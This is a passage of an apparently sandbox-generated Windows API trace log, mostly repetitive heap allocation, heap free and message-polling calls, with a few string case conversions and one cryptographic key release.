wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.575] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.575] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.575] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.575] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.575] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.575] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.577] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.577] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0261.577] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.577] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0261.577] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.577] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.577] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.577] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.578] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.578] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.578] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.578] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0261.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.580] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0261.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.581] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.581] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.581] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.582] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.582] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.582] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.582] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.582] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.583] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.583] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.583] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0261.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, 